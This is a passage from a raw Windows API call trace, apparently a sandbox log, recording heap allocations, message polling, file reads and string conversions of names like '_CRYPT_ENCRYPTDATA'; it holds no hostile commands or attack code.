wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0106.446] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0106.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0106.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0106.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.446] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0106.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0106.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0106.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0106.450] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0106.450] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x7644, lpOverlapped=0x0) returned 1 [0106.451] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0106.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0106.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0106.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0106.451] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7644) returned 0x4516010 [0106.451] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0106.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0106.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0106.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0106.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0106.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0106.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7644) returned 0x451d660 [0106.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0106.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0106.504] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0106.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0106.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0106.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0106.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0106.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7644) returned 0x4516010 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.505] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0106.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0106.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0106.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0106.505] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0106.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0106.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0106.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0106.505] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0106.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0106.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29b0 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7644) returned 0x4516010 [0106.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a40 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2960 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0106.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2970 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0106.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0106.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7644) returned 0x4524cb0 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0106.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0106.507] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0106.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0106.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0106.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41acc00 [0106.508] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0106.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0106.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0106.508] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0106.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0106.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ad0 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0106.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0106.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0106.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0106.509] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0106.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0106.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0106.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0106.510] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0106.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0106.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0106.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0106.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0106.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0106.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0106.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0106.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0106.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0106.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0106.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0106.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0106.511] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0106.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0106.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0106.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0106.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caca0 [0106.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0106.512] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0106.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0106.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0106.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0106.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0106.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0106.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0106.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0106.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0106.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0106.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0106.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0106.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0106.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0106.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b30 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0106.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0106.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0106.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 